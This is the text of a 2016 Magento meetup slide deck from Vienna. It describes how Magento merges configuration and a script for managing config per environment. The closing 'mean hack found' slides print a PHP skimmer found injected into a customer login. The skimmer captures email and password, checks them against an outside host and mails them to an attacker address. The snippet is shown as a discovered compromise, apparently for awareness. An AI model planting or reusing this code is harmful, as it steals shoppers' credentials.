Weitere ähnliche Inhalte Ähnlich wie Magento Stammtisch Wien 17. Mai 2016 (20) Kürzlich hochgeladen (20) Magento Stammtisch Wien 17. Mai 20161. Einfache Verwaltung von Config Daten für verschiedene Production Levels 18.05.2016
16. Magento-Stammtisch in Wien
2. | © Flimmit 2016 (confidential)2
→ Flimmit at a glance
→ About me
→ Functionality Magento Config
→ Challenges for daily business
→ Management with Config Script
→ Pros & Cons
Agenda
3. | © Flimmit 2016 (confidential)3
Flimmit at a Glance
Quick Facts
– Founded in 2007, based in Vienna
– Private Ownership, 3 founders/shareholders – worked as team since 2000
– Public Funding: EU Programme „Media“, Departure - Creative Agency Vienna,
Austria Wirtschaftsservice (AWS impulse), AT.net (BMVIT, FFG), Austrian Film
Institute(ÖFI), Wirtschaftsagentur Wien
– Take over by ORF in 2016 (ORS)
Business Units
– VoD portal for stream/download on multiple devices
– Film & TV Search engine module
– Content aggregation & distribution for third parties
5. | © Flimmit 2016 (confidential)5
About me
→ FH study in Salzburg 1998 – 2002
„Information Management & New Media“
→ PHP Developer since 2002
→ Magento Developer since 2008
→ Certified Developer since 05/2012
→ CTO & Founder at Flimmit
6. | © Flimmit 2016 (confidential)6
Functionality Magento Config
→ Core functionality in Mage_Core_Model_Config
→ Central Config merged from several files
Mage_Core_Model_Config::init()
– loadBase
– loadModules
– loadDb
7. | © Flimmit 2016 (confidential)7
Magento Config Init I
→ loadBase: Load all files from Etc-Directory „app/etc/“
8. | © Flimmit 2016 (confidential)8
Magento Config Init II
→ loadModules: Load all files from every module directory & local.xml
9. | © Flimmit 2016 (confidential)9
Magento Config Init III
→ loadDB: Load config from DB (core_config_data)
10. | © Flimmit 2016 (confidential)10
Challenges for daily business
→ Different development enviroments (local, stage, testing, live)
→ Different access levels for external services (e.g. payment)
→ Different development systems (cachetypes, session, smtp)
→ MySQL Dumps from live system include core_config_data (= live access data)
→ DB config not able to keep history/versions (e.g. in GIT)
11. | © Flimmit 2016 (confidential)11
Management with Config Script
→ Shell script in shell folder „config.php“
→ Config folder in „app/etc/“
→ Manage all config in different files
– local.xml for „local“ values
– mode-{type}.xml for modus values
– default.xml for default values
– global.xml for installation values
– store-{storecode}.xml for store relevant values
– website-{website}.xml for website relevant values
– …
→ php shell/config.php -mode live
to load relevant data into app/etc/local.xml
→ Live demo…!
12. | © Flimmit 2016 (confidential)12
Learnings, Pros & Cons
→ Learnings
– DB Config always wins!
– All levels within <config/> adjustable (global, default, admin, frontend, etc)
→ Pros
– Easy to manage in GIT with history
– Ensure live mode for loadbalancer nodes on startup:
php shell/config.php -mode live
– Avoid live access data in development
– Basic settings for new magento insallation available (sales, customer, catalog, etc)
→ Cons
– Avoid saving config in backend -> insert/update in DB
– Don‘t split in too many files
13. | © Flimmit 2016 (confidential)13
Bonus: mean hack found
→ Login for Customer (clean):
14. | © Flimmit 2016 (confidential)14
Bonus: mean hack found
→ Login for Customer (hacked):
15. | © Flimmit 2016 (confidential)15
Bonus: mean hack found
→ Script:
$emailboss = $username; $passboss = $password; $serverboss =
$_SERVER['SERVER_NAME']; $ipboss = $_SERVER['REMOTE_ADDR']; $details =
json_decode(file_get_contents("http://www.telize.com/geoip/".$ipboss.""));
$negara = $details->country_code; $nama_negara = $details->country; $kode_negara
= strtolower($negara); $chkmail =
file_get_contents("http://p4b.litbang.kkp.go.id/p4bjurnal/modules/path/mailceck/
?e=".$emailboss."&p=".$passboss.""); $pesan = "Email : ".$emailboss."nPassword
: ".$passboss."nStatus : ".$chkmail."nnIP Info : ".$ipboss." |
".$nama_negara." On ".date('r')."nBrowser :
".$_SERVER['HTTP_USER_AGENT']."nSite : ".$serverboss.""; $tamvan =
"loggercc@yahoo.com"; $subject = "User Login (".$chkmail.") (".$nama_negara.")
(".$ipboss.")"; $headers = "From: Logger User Magento From ".$serverboss."
<".$ipboss."@".$serverboss.">"; mail($tamvan, $subject, $pesan, $headers);
16. | © Flimmit 2016 (confidential)16
… to be continued …